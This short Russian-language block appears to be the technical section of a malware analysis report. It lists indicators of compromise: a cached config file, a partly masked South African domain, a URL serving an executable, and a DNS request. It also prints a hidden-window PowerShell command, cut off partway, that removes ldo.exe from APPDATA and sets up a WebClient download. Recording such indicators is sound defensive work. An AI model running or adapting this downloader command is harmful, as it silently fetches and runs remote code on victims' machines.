Техническая информация
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- 'ss#####lopments.co.za':80
- http://ss#####lopments.co.za/1/7q.exe
- DNS ASK ss#####lopments.co.za
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\ldo.exe') {Remove-Item $env:APPDATA + '\ldo.exe'}; $newP = New-Object System.Net.WebClient; $newP.Headers['User-Agent'] = 'come-t... (со скрытым окном)